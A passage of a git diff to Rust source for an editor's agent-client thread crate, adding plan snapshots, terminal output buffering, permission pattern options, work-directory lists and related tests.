} = curr_status { - respond_tx.send(option_id).log_err(); + respond_tx.send(outcome).log_err(); } else if cfg!(debug_assertions) { panic!("tried to authorize an already authorized tool call"); } @@ -1851,6 +2098,13 @@ impl AcpThread { cx.notify(); } + pub fn snapshot_completed_plan(&mut self, cx: &mut Context) { + if !self.plan.is_empty() && self.plan.stats().pending == 0 { + let completed_entries = std::mem::take(&mut self.plan.entries); + self.push_entry(AgentThreadEntry::CompletedPlan(completed_entries), cx); + } + } + fn clear_completed_plan_entries(&mut self, cx: &mut Context) { self.plan .entries @@ -1858,6 +2112,11 @@ impl AcpThread { cx.notify(); } + pub fn clear_plan(&mut self, cx: &mut Context) { + self.plan.entries.clear(); + cx.notify(); + } + #[cfg(any(test, feature = "test-support"))] pub fn send_raw( &mut self, @@ -1967,8 +2226,10 @@ impl AcpThread { .await?; this.update(cx, |this, cx| { - this.project - .update(cx, |project, cx| project.set_agent_location(None, cx)); + if this.parent_session_id.is_none() { + this.project + .update(cx, |project, cx| project.set_agent_location(None, cx)); + } let Ok(response) = response else { // tx dropped, just return return Ok(None); @@ -1988,11 +2249,30 @@ impl AcpThread { match response { Ok(r) => { + Self::flush_streaming_text(&mut this.streaming_text_buffer, cx); + if r.stop_reason == acp::StopReason::MaxTokens { this.had_error = true; cx.emit(AcpThreadEvent::Error); log::error!("Max tokens reached. Usage: {:?}", this.token_usage); - return Err(anyhow!("Max tokens reached")); + + let exceeded_max_output_tokens = + this.token_usage.as_ref().is_some_and(|u| { + u.max_output_tokens + .is_some_and(|max| u.output_tokens >= max) + }); + + let message = if exceeded_max_output_tokens { + log::error!( + "Max output tokens reached. Usage: {:?}", + this.token_usage + ); + "Maximum output tokens reached" + } else { + log::error!("Max tokens reached. 
Usage: {:?}", this.token_usage); + "Maximum tokens reached" + }; + return Err(anyhow!(message)); } let canceled = matches!(r.stop_reason, acp::StopReason::Cancelled); @@ -2000,6 +2280,10 @@ impl AcpThread { this.mark_pending_tools_as_canceled(); } + if !canceled { + this.snapshot_completed_plan(cx); + } + // Handle refusal - distinguish between user prompt and tool call refusals if let acp::StopReason::Refusal = r.stop_reason { this.had_error = true; @@ -2040,6 +2324,8 @@ impl AcpThread { Ok(Some(r)) } Err(e) => { + Self::flush_streaming_text(&mut this.streaming_text_buffer, cx); + this.had_error = true; cx.emit(AcpThreadEvent::Error); log::error!("Error in run turn: {:?}", e); @@ -2057,6 +2343,7 @@ impl AcpThread { }; self.connection.cancel(&self.session_id, cx); + Self::flush_streaming_text(&mut self.streaming_text_buffer, cx); self.mark_pending_tools_as_canceled(); // Wait for the send task to complete @@ -2121,6 +2408,7 @@ impl AcpThread { return Task::ready(Err(anyhow!("not supported"))); }; + Self::flush_streaming_text(&mut self.streaming_text_buffer, cx); let telemetry = ActionLogTelemetry::from(&*self); cx.spawn(async move |this, cx| { cx.update(|cx| truncate.run(id.clone(), cx)).await?; @@ -2240,6 +2528,7 @@ impl AcpThread { let limit = limit.unwrap_or(u32::MAX); let project = self.project.clone(); let action_log = self.action_log.clone(); + let should_update_agent_location = self.parent_session_id.is_none(); cx.spawn(async move |this, cx| { let load = project.update(cx, |project, cx| { let path = project @@ -2290,15 +2579,17 @@ impl AcpThread { let start = snapshot.anchor_before(start_position); let end = snapshot.anchor_before(Point::new(line.saturating_add(limit), 0)); - project.update(cx, |project, cx| { - project.set_agent_location( - Some(AgentLocation { - buffer: buffer.downgrade(), - position: start, - }), - cx, - ); - }); + if should_update_agent_location { + project.update(cx, |project, cx| { + project.set_agent_location( + Some(AgentLocation { + 
buffer: buffer.downgrade(), + position: start, + }), + cx, + ); + }); + } Ok(snapshot.text_for_range(start..end).collect::()) }) @@ -2312,6 +2603,7 @@ impl AcpThread { ) -> Task> { let project = self.project.clone(); let action_log = self.action_log.clone(); + let should_update_agent_location = self.parent_session_id.is_none(); cx.spawn(async move |this, cx| { let load = project.update(cx, |project, cx| { let path = project @@ -2333,24 +2625,26 @@ impl AcpThread { text_diff(old_text.as_str(), &content) .into_iter() .map(|(range, replacement)| { - (snapshot.anchor_range_around(range), replacement) + (snapshot.anchor_range_inside(range), replacement) }) .collect::>() }) .await; - project.update(cx, |project, cx| { - project.set_agent_location( - Some(AgentLocation { - buffer: buffer.downgrade(), - position: edits - .last() - .map(|(range, _)| range.end) - .unwrap_or(Anchor::min_for_buffer(buffer.read(cx).remote_id())), - }), - cx, - ); - }); + if should_update_agent_location { + project.update(cx, |project, cx| { + project.set_agent_location( + Some(AgentLocation { + buffer: buffer.downgrade(), + position: edits + .last() + .map(|(range, _)| range.end) + .unwrap_or(Anchor::min_for_buffer(buffer.read(cx).remote_id())), + }), + cx, + ); + }); + } let format_on_save = cx.update(|cx| { action_log.update(cx, |action_log, cx| { @@ -2360,11 +2654,8 @@ impl AcpThread { let format_on_save = buffer.update(cx, |buffer, cx| { buffer.edit(edits, None, cx); - let settings = language::language_settings::language_settings( - buffer.language().map(|l| l.name()), - buffer.file(), - cx, - ); + let settings = + language::language_settings::LanguageSettings::for_buffer(buffer, cx); settings.format_on_save != FormatOnSave::Off }); @@ -2562,6 +2853,85 @@ impl AcpThread { } } } + + pub fn on_terminal_provider_event( + &mut self, + event: TerminalProviderEvent, + cx: &mut Context, + ) { + match event { + TerminalProviderEvent::Created { + terminal_id, + label, + cwd, + output_byte_limit, + 
terminal, + } => { + let entity = self.register_terminal_created( + terminal_id.clone(), + label, + cwd, + output_byte_limit, + terminal, + cx, + ); + + if let Some(mut chunks) = self.pending_terminal_output.remove(&terminal_id) { + for data in chunks.drain(..) { + entity.update(cx, |term, cx| { + term.inner().update(cx, |inner, cx| { + inner.write_output(&data, cx); + }) + }); + } + } + + if let Some(_status) = self.pending_terminal_exit.remove(&terminal_id) { + entity.update(cx, |_term, cx| { + cx.notify(); + }); + } + + cx.notify(); + } + TerminalProviderEvent::Output { terminal_id, data } => { + if let Some(entity) = self.terminals.get(&terminal_id) { + entity.update(cx, |term, cx| { + term.inner().update(cx, |inner, cx| { + inner.write_output(&data, cx); + }) + }); + } else { + self.pending_terminal_output + .entry(terminal_id) + .or_default() + .push(data); + } + } + TerminalProviderEvent::TitleChanged { terminal_id, title } => { + if let Some(entity) = self.terminals.get(&terminal_id) { + entity.update(cx, |term, cx| { + term.inner().update(cx, |inner, cx| { + inner.breadcrumb_text = title; + cx.emit(::terminal::Event::BreadcrumbsChanged); + }) + }); + } + } + TerminalProviderEvent::Exit { + terminal_id, + status, + } => { + if let Some(entity) = self.terminals.get(&terminal_id) { + entity.update(cx, |_term, cx| { + cx.notify(); + }); + } else { + self.pending_terminal_exit.insert(terminal_id, status); + } + } + } + } } fn markdown_for_raw_output( @@ -2615,7 +2985,7 @@ mod tests { use futures::{channel::mpsc, future::LocalBoxFuture, select}; use gpui::{App, AsyncApp, TestAppContext, WeakEntity}; use indoc::indoc; - use project::{FakeFs, Fs}; + use project::{AgentId, FakeFs, Fs}; use rand::{distr, prelude::*}; use serde_json::json; use settings::SettingsStore; @@ -2628,7 +2998,7 @@ mod tests { sync::atomic::{AtomicBool, AtomicUsize, Ordering::SeqCst}, time::Duration, }; - use util::path; + use util::{path, path_list::PathList}; fn init_test(cx: &mut 
TestAppContext) { env_logger::try_init().ok(); @@ -2646,7 +3016,13 @@ mod tests { let project = Project::test(fs, [], cx).await; let connection = Rc::new(FakeAgentConnection::new()); let thread = cx - .update(|cx| connection.new_session(project, std::path::Path::new(path!("/test")), cx)) + .update(|cx| { + connection.new_session( + project, + PathList::new(&[std::path::Path::new(path!("/test"))]), + cx, + ) + }) .await .unwrap(); @@ -2710,7 +3086,13 @@ mod tests { let project = Project::test(fs, [], cx).await; let connection = Rc::new(FakeAgentConnection::new()); let thread = cx - .update(|cx| connection.new_session(project, std::path::Path::new(path!("/test")), cx)) + .update(|cx| { + connection.new_session( + project, + PathList::new(&[std::path::Path::new(path!("/test"))]), + cx, + ) + }) .await .unwrap(); @@ -2798,7 +3180,13 @@ mod tests { let project = Project::test(fs, [], cx).await; let connection = Rc::new(FakeAgentConnection::new()); let thread = cx - .update(|cx| connection.new_session(project.clone(), Path::new(path!("/test")), cx)) + .update(|cx| { + connection.new_session( + project.clone(), + PathList::new(&[Path::new(path!("/test"))]), + cx, + ) + }) .await .unwrap(); @@ -2855,9 +3243,27 @@ mod tests { ); }); - // Wait for the printf command to execute and produce output - // Use real time since parking is enabled - cx.executor().timer(Duration::from_millis(500)).await; + // Poll until the printf command produces output, rather than using a + // fixed sleep which is flaky on loaded machines. 
+ let deadline = std::time::Instant::now() + Duration::from_secs(10); + loop { + let has_output = thread.read_with(cx, |thread, cx| { + let term = thread + .terminals + .get(&terminal_id) + .expect("terminal not found"); + let content = term.read(cx).inner().read(cx).get_content(); + content.contains("output_before_kill") + }); + if has_output { + break; + } + assert!( + std::time::Instant::now() < deadline, + "Timed out waiting for printf output to appear in terminal", + ); + cx.executor().timer(Duration::from_millis(50)).await; + } // Get the acp_thread Terminal and kill it let wait_for_exit = thread.update(cx, |thread, cx| { @@ -2909,7 +3315,9 @@ mod tests { let project = Project::test(fs, [], cx).await; let connection = Rc::new(FakeAgentConnection::new()); let thread = cx - .update(|cx| connection.new_session(project, Path::new(path!("/test")), cx)) + .update(|cx| { + connection.new_session(project, PathList::new(&[Path::new(path!("/test"))]), cx) + }) .await .unwrap(); @@ -3003,7 +3411,9 @@ mod tests { )); let thread = cx - .update(|cx| connection.new_session(project, Path::new(path!("/test")), cx)) + .update(|cx| { + connection.new_session(project, PathList::new(&[Path::new(path!("/test"))]), cx) + }) .await .unwrap(); @@ -3084,7 +3494,9 @@ mod tests { .unwrap(); let thread = cx - .update(|cx| connection.new_session(project, Path::new(path!("/tmp")), cx)) + .update(|cx| { + connection.new_session(project, PathList::new(&[Path::new(path!("/tmp"))]), cx) + }) .await .unwrap(); @@ -3125,7 +3537,9 @@ mod tests { let connection = Rc::new(FakeAgentConnection::new()); let thread = cx - .update(|cx| connection.new_session(project, Path::new(path!("/tmp")), cx)) + .update(|cx| { + connection.new_session(project, PathList::new(&[Path::new(path!("/tmp"))]), cx) + }) .await .unwrap(); @@ -3200,7 +3614,9 @@ mod tests { let connection = Rc::new(FakeAgentConnection::new()); let thread = cx - .update(|cx| connection.new_session(project, Path::new(path!("/tmp")), cx)) + 
.update(|cx| { + connection.new_session(project, PathList::new(&[Path::new(path!("/tmp"))]), cx) + }) .await .unwrap(); @@ -3274,7 +3690,9 @@ mod tests { let connection = Rc::new(FakeAgentConnection::new()); let thread = cx - .update(|cx| connection.new_session(project, Path::new(path!("/tmp")), cx)) + .update(|cx| { + connection.new_session(project, PathList::new(&[Path::new(path!("/tmp"))]), cx) + }) .await .unwrap(); @@ -3322,7 +3740,9 @@ mod tests { })); let thread = cx - .update(|cx| connection.new_session(project, Path::new(path!("/test")), cx)) + .update(|cx| { + connection.new_session(project, PathList::new(&[Path::new(path!("/test"))]), cx) + }) .await .unwrap(); @@ -3413,7 +3833,9 @@ mod tests { })); let thread = cx - .update(|cx| connection.new_session(project, Path::new(path!("/test")), cx)) + .update(|cx| { + connection.new_session(project, PathList::new(&[Path::new(path!("/test"))]), cx) + }) .await .unwrap(); @@ -3472,7 +3894,9 @@ mod tests { } })); let thread = cx - .update(|cx| connection.new_session(project, Path::new(path!("/test")), cx)) + .update(|cx| { + connection.new_session(project, PathList::new(&[Path::new(path!("/test"))]), cx) + }) .await .unwrap(); @@ -3645,7 +4069,9 @@ mod tests { })); let thread = cx - .update(|cx| connection.new_session(project, Path::new(path!("/test")), cx)) + .update(|cx| { + connection.new_session(project, PathList::new(&[Path::new(path!("/test"))]), cx) + }) .await .unwrap(); @@ -3721,7 +4147,9 @@ mod tests { })); let thread = cx - .update(|cx| connection.new_session(project, Path::new(path!("/test")), cx)) + .update(|cx| { + connection.new_session(project, PathList::new(&[Path::new(path!("/test"))]), cx) + }) .await .unwrap(); @@ -3794,7 +4222,9 @@ mod tests { } })); let thread = cx - .update(|cx| connection.new_session(project, Path::new(path!("/test")), cx)) + .update(|cx| { + connection.new_session(project, PathList::new(&[Path::new(path!("/test"))]), cx) + }) .await .unwrap(); @@ -3871,6 +4301,7 @@ mod 
tests { struct FakeAgentConnection { auth_methods: Vec, sessions: Arc>>>, + set_title_calls: Rc>>, on_user_message: Option< Rc< dyn Fn( @@ -3889,6 +4320,7 @@ mod tests { auth_methods: Vec::new(), on_user_message: None, sessions: Arc::default(), + set_title_calls: Default::default(), } } @@ -3913,6 +4345,10 @@ mod tests { } impl AgentConnection for FakeAgentConnection { + fn agent_id(&self) -> AgentId { + AgentId::new("fake") + } + fn telemetry_id(&self) -> SharedString { "fake".into() } @@ -3924,7 +4360,7 @@ mod tests { fn new_session( self: Rc, project: Entity, - _cwd: &Path, + work_dirs: PathList, cx: &mut App, ) -> Task>> { let session_id = acp::SessionId::new( @@ -3938,7 +4374,8 @@ mod tests { let thread = cx.new(|cx| { AcpThread::new( None, - "Test", + None, + Some(work_dirs), self.clone(), project, action_log, @@ -3957,7 +4394,7 @@ mod tests { } fn authenticate(&self, method: acp::AuthMethodId, _cx: &mut App) -> Task> { - if self.auth_methods().iter().any(|m| m.id == method) { + if self.auth_methods().iter().any(|m| m.id() == &method) { Task::ready(Ok(())) } else { Task::ready(Err(anyhow!("Invalid Auth Method"))) @@ -3993,11 +4430,32 @@ mod tests { })) } + fn set_title( + &self, + _session_id: &acp::SessionId, + _cx: &App, + ) -> Option> { + Some(Rc::new(FakeAgentSessionSetTitle { + calls: self.set_title_calls.clone(), + })) + } + fn into_any(self: Rc) -> Rc { self } } + struct FakeAgentSessionSetTitle { + calls: Rc>>, + } + + impl AgentSessionSetTitle for FakeAgentSessionSetTitle { + fn run(&self, title: SharedString, _cx: &mut App) -> Task> { + self.calls.borrow_mut().push(title); + Task::ready(Ok(())) + } + } + struct FakeAgentSessionEditor { _session_id: acp::SessionId, } @@ -4016,7 +4474,9 @@ mod tests { let project = Project::test(fs, [], cx).await; let connection = Rc::new(FakeAgentConnection::new()); let thread = cx - .update(|cx| connection.new_session(project, Path::new(path!("/test")), cx)) + .update(|cx| { + connection.new_session(project, 
PathList::new(&[Path::new(path!("/test"))]), cx) + }) .await .unwrap(); @@ -4082,7 +4542,9 @@ mod tests { let project = Project::test(fs, [], cx).await; let connection = Rc::new(FakeAgentConnection::new()); let thread = cx - .update(|cx| connection.new_session(project, Path::new(path!("/test")), cx)) + .update(|cx| { + connection.new_session(project, PathList::new(&[Path::new(path!("/test"))]), cx) + }) .await .unwrap(); @@ -4395,7 +4857,9 @@ mod tests { )); let thread = cx - .update(|cx| connection.new_session(project, Path::new(path!("/test")), cx)) + .update(|cx| { + connection.new_session(project, PathList::new(&[Path::new(path!("/test"))]), cx) + }) .await .unwrap(); @@ -4469,7 +4933,9 @@ mod tests { })); let thread = cx - .update(|cx| connection.new_session(project, Path::new(path!("/test")), cx)) + .update(|cx| { + connection.new_session(project, PathList::new(&[Path::new(path!("/test"))]), cx) + }) .await .unwrap(); @@ -4552,7 +5018,9 @@ mod tests { )); let thread = cx - .update(|cx| connection.new_session(project, Path::new(path!("/test")), cx)) + .update(|cx| { + connection.new_session(project, PathList::new(&[Path::new(path!("/test"))]), cx) + }) .await .unwrap(); @@ -4589,4 +5057,138 @@ mod tests { ); }); } + + #[gpui::test] + async fn test_provisional_title_replaced_by_real_title(cx: &mut TestAppContext) { + init_test(cx); + + let fs = FakeFs::new(cx.executor()); + let project = Project::test(fs, [], cx).await; + let connection = Rc::new(FakeAgentConnection::new()); + let set_title_calls = connection.set_title_calls.clone(); + + let thread = cx + .update(|cx| { + connection.new_session(project, PathList::new(&[Path::new(path!("/test"))]), cx) + }) + .await + .unwrap(); + + // Initial title is the default. + thread.read_with(cx, |thread, _| { + assert_eq!(thread.title(), None); + }); + + // Setting a provisional title updates the display title. 
+ thread.update(cx, |thread, cx| { + thread.set_provisional_title("Hello, can you help…".into(), cx); + }); + thread.read_with(cx, |thread, _| { + assert_eq!( + thread.title().as_ref().map(|s| s.as_str()), + Some("Hello, can you help…") + ); + }); + + // The provisional title should NOT have propagated to the connection. + assert_eq!( + set_title_calls.borrow().len(), + 0, + "provisional title should not propagate to the connection" + ); + + // When the real title arrives via set_title, it replaces the + // provisional title and propagates to the connection. + let task = thread.update(cx, |thread, cx| { + thread.set_title("Helping with Rust question".into(), cx) + }); + task.await.expect("set_title should succeed"); + thread.read_with(cx, |thread, _| { + assert_eq!( + thread.title().as_ref().map(|s| s.as_str()), + Some("Helping with Rust question") + ); + }); + assert_eq!( + set_title_calls.borrow().as_slice(), + &[SharedString::from("Helping with Rust question")], + "real title should propagate to the connection" + ); + } + + #[gpui::test] + async fn test_session_info_update_replaces_provisional_title_and_emits_event( + cx: &mut TestAppContext, + ) { + init_test(cx); + + let fs = FakeFs::new(cx.executor()); + let project = Project::test(fs, [], cx).await; + let connection = Rc::new(FakeAgentConnection::new()); + + let thread = cx + .update(|cx| { + connection.clone().new_session( + project, + PathList::new(&[Path::new(path!("/test"))]), + cx, + ) + }) + .await + .unwrap(); + + let title_updated_events = Rc::new(RefCell::new(0usize)); + let title_updated_events_for_subscription = title_updated_events.clone(); + thread.update(cx, |_thread, cx| { + cx.subscribe( + &thread, + move |_thread, _event_thread, event: &AcpThreadEvent, _cx| { + if matches!(event, AcpThreadEvent::TitleUpdated) { + *title_updated_events_for_subscription.borrow_mut() += 1; + } + }, + ) + .detach(); + }); + + thread.update(cx, |thread, cx| { + thread.set_provisional_title("Hello, can you 
help…".into(), cx); + }); + assert_eq!( + *title_updated_events.borrow(), + 1, + "setting a provisional title should emit TitleUpdated" + ); + + let result = thread.update(cx, |thread, cx| { + thread.handle_session_update( + acp::SessionUpdate::SessionInfoUpdate( + acp::SessionInfoUpdate::new().title("Helping with Rust question"), + ), + cx, + ) + }); + result.expect("session info update should succeed"); + + thread.read_with(cx, |thread, _| { + assert_eq!( + thread.title().as_ref().map(|s| s.as_str()), + Some("Helping with Rust question") + ); + assert!( + !thread.has_provisional_title(), + "session info title update should clear provisional title" + ); + }); + + assert_eq!( + *title_updated_events.borrow(), + 2, + "session info title update should emit TitleUpdated" + ); + assert!( + connection.set_title_calls.borrow().is_empty(), + "session info title update should not propagate back to the connection" + ); + } } diff --git a/crates/acp_thread/src/connection.rs b/crates/acp_thread/src/connection.rs index 0becded53762be7c96789b0d31191fd9cbc02bfe..58a8aa33830f12ffb713490c87c47133cc2ad96f 100644 --- a/crates/acp_thread/src/connection.rs +++ b/crates/acp_thread/src/connection.rs @@ -2,20 +2,15 @@ use crate::AcpThread; use agent_client_protocol::{self as acp}; use anyhow::Result; use chrono::{DateTime, Utc}; -use collections::IndexMap; +use collections::{HashMap, IndexMap}; use gpui::{Entity, SharedString, Task}; use language_model::LanguageModelProviderId; -use project::Project; +use project::{AgentId, Project}; use serde::{Deserialize, Serialize}; -use std::{ - any::Any, - error::Error, - fmt, - path::{Path, PathBuf}, - rc::Rc, - sync::Arc, -}; +use std::{any::Any, error::Error, fmt, path::PathBuf, rc::Rc, sync::Arc}; +use task::{HideStrategy, SpawnInTerminal, TaskId}; use ui::{App, IconName}; +use util::path_list::PathList; use uuid::Uuid; #[derive(Debug, Clone, PartialEq, Eq, Serialize, Deserialize, Hash)] @@ -27,13 +22,37 @@ impl UserMessageId { } } +pub fn 
build_terminal_auth_task( + id: String, + label: String, + command: String, + args: Vec, + env: HashMap, +) -> SpawnInTerminal { + SpawnInTerminal { + id: TaskId(id), + full_label: label.clone(), + label: label.clone(), + command: Some(command), + args, + command_label: label, + env, + use_new_terminal: true, + allow_concurrent_runs: true, + hide: HideStrategy::Always, + ..Default::default() + } +} + pub trait AgentConnection { + fn agent_id(&self) -> AgentId; + fn telemetry_id(&self) -> SharedString; fn new_session( self: Rc, project: Entity, - cwd: &Path, + _work_dirs: PathList, cx: &mut App, ) -> Task>>; @@ -45,9 +64,10 @@ pub trait AgentConnection { /// Load an existing session by ID. fn load_session( self: Rc, - _session: AgentSessionInfo, + _session_id: acp::SessionId, _project: Entity, - _cwd: &Path, + _work_dirs: PathList, + _title: Option, _cx: &mut App, ) -> Task>> { Task::ready(Err(anyhow::Error::msg("Loading sessions is not supported"))) @@ -59,7 +79,11 @@ pub trait AgentConnection { } /// Close an existing session. Allows the agent to free the session from memory. - fn close_session(&self, _session_id: &acp::SessionId, _cx: &mut App) -> Task> { + fn close_session( + self: Rc, + _session_id: &acp::SessionId, + _cx: &mut App, + ) -> Task> { Task::ready(Err(anyhow::Error::msg("Closing sessions is not supported"))) } @@ -71,9 +95,10 @@ pub trait AgentConnection { /// Resume an existing session by ID without replaying previous messages. 
fn resume_session( self: Rc, - _session: AgentSessionInfo, + _session_id: acp::SessionId, _project: Entity, - _cwd: &Path, + _work_dirs: PathList, + _title: Option, _cx: &mut App, ) -> Task>> { Task::ready(Err(anyhow::Error::msg( @@ -88,6 +113,14 @@ pub trait AgentConnection { fn auth_methods(&self) -> &[acp::AuthMethod]; + fn terminal_auth_task( + &self, + _method: &acp::AuthMethodId, + _cx: &App, + ) -> Option { + None + } + fn authenticate(&self, method: acp::AuthMethodId, cx: &mut App) -> Task>; fn prompt( @@ -237,9 +270,10 @@ impl AgentSessionListResponse { #[derive(Debug, Clone, PartialEq)] pub struct AgentSessionInfo { pub session_id: acp::SessionId, - pub cwd: Option, + pub work_dirs: Option, pub title: Option, pub updated_at: Option>, + pub created_at: Option>, pub meta: Option, } @@ -247,9 +281,10 @@ impl AgentSessionInfo { pub fn new(session_id: impl Into) -> Self { Self { session_id: session_id.into(), - cwd: None, + work_dirs: None, title: None, updated_at: None, + created_at: None, meta: None, } } @@ -435,18 +470,53 @@ impl AgentModelList { pub struct PermissionOptionChoice { pub allow: acp::PermissionOption, pub deny: acp::PermissionOption, + pub sub_patterns: Vec, } impl PermissionOptionChoice { pub fn label(&self) -> SharedString { self.allow.name.clone().into() } + + /// Build a `SelectedPermissionOutcome` for this choice. + /// + /// If the choice carries `sub_patterns`, they are attached as + /// `SelectedPermissionParams::Terminal`. 
+ pub fn build_outcome(&self, is_allow: bool) -> crate::SelectedPermissionOutcome { + let option = if is_allow { &self.allow } else { &self.deny }; + + let params = if !self.sub_patterns.is_empty() { + Some(crate::SelectedPermissionParams::Terminal { + patterns: self.sub_patterns.clone(), + }) + } else { + None + }; + + crate::SelectedPermissionOutcome::new(option.option_id.clone(), option.kind).params(params) + } +} + +/// Pairs a tool's permission pattern with its display name +/// +/// For example, a pattern of `^cargo\\s+build(\\s|$)` would display as `cargo +/// build`. It's handy to keep these together rather than trying to derive +/// one from the other. +#[derive(Debug, Clone, PartialEq)] +pub struct PermissionPattern { + pub pattern: String, + pub display_name: String, } #[derive(Debug, Clone)] pub enum PermissionOptions { Flat(Vec), Dropdown(Vec), + DropdownWithPatterns { + choices: Vec, + patterns: Vec, + tool_name: String, + }, } impl PermissionOptions { @@ -454,6 +524,7 @@ impl PermissionOptions { match self { PermissionOptions::Flat(options) => options.is_empty(), PermissionOptions::Dropdown(options) => options.is_empty(), + PermissionOptions::DropdownWithPatterns { choices, .. } => choices.is_empty(), } } @@ -472,6 +543,17 @@ impl PermissionOptions { None } }), + PermissionOptions::DropdownWithPatterns { choices, .. } => { + choices.iter().find_map(|choice| { + if choice.allow.kind == kind { + Some(&choice.allow) + } else if choice.deny.kind == kind { + Some(&choice.deny) + } else { + None + } + }) + } } } @@ -484,6 +566,57 @@ impl PermissionOptions { self.first_option_of_kind(acp::PermissionOptionKind::RejectOnce) .map(|option| option.option_id.clone()) } + + /// Build a `SelectedPermissionOutcome` for the `DropdownWithPatterns` + /// variant when the user has checked specific pattern indices. + /// + /// Returns `Some` with the always-allow/deny outcome when at least one + /// pattern is checked. 
Returns `None` when zero patterns are checked, + /// signaling that the caller should degrade to allow-once / deny-once. + /// + /// Panics (debug) or returns `None` (release) if called on a non- + /// `DropdownWithPatterns` variant. + pub fn build_outcome_for_checked_patterns( + &self, + checked_indices: &[usize], + is_allow: bool, + ) -> Option { + let PermissionOptions::DropdownWithPatterns { + choices, patterns, .. + } = self + else { + debug_assert!( + false, + "build_outcome_for_checked_patterns called on non-DropdownWithPatterns" + ); + return None; + }; + + let checked_patterns: Vec = patterns + .iter() + .enumerate() + .filter(|(index, _)| checked_indices.contains(index)) + .map(|(_, cp)| cp.pattern.clone()) + .collect(); + + if checked_patterns.is_empty() { + return None; + } + + // Use the first choice (the "Always" choice) as the base for the outcome. + let always_choice = choices.first()?; + let option = if is_allow { + &always_choice.allow + } else { + &always_choice.deny + }; + + let outcome = crate::SelectedPermissionOutcome::new(option.option_id.clone(), option.kind) + .params(Some(crate::SelectedPermissionParams::Terminal { + patterns: checked_patterns, + })); + Some(outcome) + } } #[cfg(feature = "test-support")] @@ -496,6 +629,7 @@ mod test_support { //! 
- `create_test_png_base64` for generating test images use std::sync::Arc; + use std::sync::atomic::{AtomicUsize, Ordering}; use action_log::ActionLog; use collections::HashMap; @@ -531,11 +665,14 @@ mod test_support { ) } - #[derive(Clone, Default)] + #[derive(Clone)] pub struct StubAgentConnection { sessions: Arc>>, permission_requests: HashMap, next_prompt_updates: Arc>>, + supports_load_session: bool, + agent_id: AgentId, + telemetry_id: SharedString, } struct Session { @@ -543,12 +680,21 @@ mod test_support { response_tx: Option>, } + impl Default for StubAgentConnection { + fn default() -> Self { + Self::new() + } + } + impl StubAgentConnection { pub fn new() -> Self { Self { next_prompt_updates: Default::default(), permission_requests: HashMap::default(), sessions: Arc::default(), + supports_load_session: false, + agent_id: AgentId::new("stub"), + telemetry_id: "stub".into(), } } @@ -564,6 +710,58 @@ mod test_support { self } + pub fn with_supports_load_session(mut self, supports_load_session: bool) -> Self { + self.supports_load_session = supports_load_session; + self + } + + pub fn with_agent_id(mut self, agent_id: AgentId) -> Self { + self.agent_id = agent_id; + self + } + + pub fn with_telemetry_id(mut self, telemetry_id: SharedString) -> Self { + self.telemetry_id = telemetry_id; + self + } + + fn create_session( + self: Rc, + session_id: acp::SessionId, + project: Entity, + work_dirs: PathList, + title: Option, + cx: &mut gpui::App, + ) -> Entity { + let action_log = cx.new(|_| ActionLog::new(project.clone())); + let thread = cx.new(|cx| { + AcpThread::new( + None, + title, + Some(work_dirs), + self.clone(), + project, + action_log, + session_id.clone(), + watch::Receiver::constant( + acp::PromptCapabilities::new() + .image(true) + .audio(true) + .embedded_context(true), + ), + cx, + ) + }); + self.sessions.lock().insert( + session_id, + Session { + thread: thread.downgrade(), + response_tx: None, + }, + ); + thread + } + pub fn send_update( &self, 
session_id: acp::SessionId, @@ -600,8 +798,12 @@ mod test_support { } impl AgentConnection for StubAgentConnection { + fn agent_id(&self) -> AgentId { + self.agent_id.clone() + } + fn telemetry_id(&self) -> SharedString { - "stub".into() + self.telemetry_id.clone() } fn auth_methods(&self) -> &[acp::AuthMethod] { @@ -618,35 +820,33 @@ mod test_support { fn new_session( self: Rc, project: Entity, - _cwd: &Path, + work_dirs: PathList, cx: &mut gpui::App, ) -> Task>> { - let session_id = acp::SessionId::new(self.sessions.lock().len().to_string()); - let action_log = cx.new(|_| ActionLog::new(project.clone())); - let thread = cx.new(|cx| { - AcpThread::new( - None, - "Test", - self.clone(), - project, - action_log, - session_id.clone(), - watch::Receiver::constant( - acp::PromptCapabilities::new() - .image(true) - .audio(true) - .embedded_context(true), - ), - cx, - ) - }); - self.sessions.lock().insert( - session_id, - Session { - thread: thread.downgrade(), - response_tx: None, - }, - ); + static NEXT_SESSION_ID: AtomicUsize = AtomicUsize::new(0); + let session_id = + acp::SessionId::new(NEXT_SESSION_ID.fetch_add(1, Ordering::SeqCst).to_string()); + let thread = self.create_session(session_id, project, work_dirs, None, cx); + Task::ready(Ok(thread)) + } + + fn supports_load_session(&self) -> bool { + self.supports_load_session + } + + fn load_session( + self: Rc, + session_id: acp::SessionId, + project: Entity, + work_dirs: PathList, + title: Option, + cx: &mut App, + ) -> Task>> { + if !self.supports_load_session { + return Task::ready(Err(anyhow::Error::msg("Loading sessions is not supported"))); + } + + let thread = self.create_session(session_id, project, work_dirs, title, cx); Task::ready(Ok(thread)) } diff --git a/crates/acp_thread/src/diff.rs b/crates/acp_thread/src/diff.rs index 8886b458d623237b74f715d3c1d0def33fbefa7d..a6d3b86db7c980bb5e4e5a8cacee95abeaabc3f1 100644 --- a/crates/acp_thread/src/diff.rs +++ b/crates/acp_thread/src/diff.rs @@ -149,6 +149,16 @@ 
impl Diff { } } + pub fn file_path(&self, cx: &App) -> Option { + match self { + Self::Pending(PendingDiff { new_buffer, .. }) => new_buffer + .read(cx) + .file() + .map(|file| file.full_path(cx).to_string_lossy().into_owned()), + Self::Finalized(FinalizedDiff { path, .. }) => Some(path.clone()), + } + } + pub fn multibuffer(&self) -> &Entity { match self { Self::Pending(PendingDiff { multibuffer, .. }) => multibuffer, @@ -181,7 +191,7 @@ impl Diff { } pub fn has_revealed_range(&self, cx: &App) -> bool { - self.multibuffer().read(cx).paths().next().is_some() + !self.multibuffer().read(cx).is_empty() } pub fn needs_update(&self, old_text: &str, new_text: &str, cx: &App) -> bool { diff --git a/crates/acp_thread/src/mention.rs b/crates/acp_thread/src/mention.rs index 5769d13860f2466f95fe7dd67c1f908812e40c2d..28038ecbc04c59d1c5107872210056f11b413141 100644 --- a/crates/acp_thread/src/mention.rs +++ b/crates/acp_thread/src/mention.rs @@ -19,7 +19,9 @@ pub enum MentionUri { File { abs_path: PathBuf, }, - PastedImage, + PastedImage { + name: String, + }, Directory { abs_path: PathBuf, }, @@ -32,10 +34,6 @@ pub enum MentionUri { id: acp::SessionId, name: String, }, - TextThread { - path: PathBuf, - name: String, - }, Rule { id: PromptId, name: String, @@ -60,6 +58,9 @@ pub enum MentionUri { GitDiff { base_ref: String, }, + MergeConflict { + file_path: String, + }, } impl 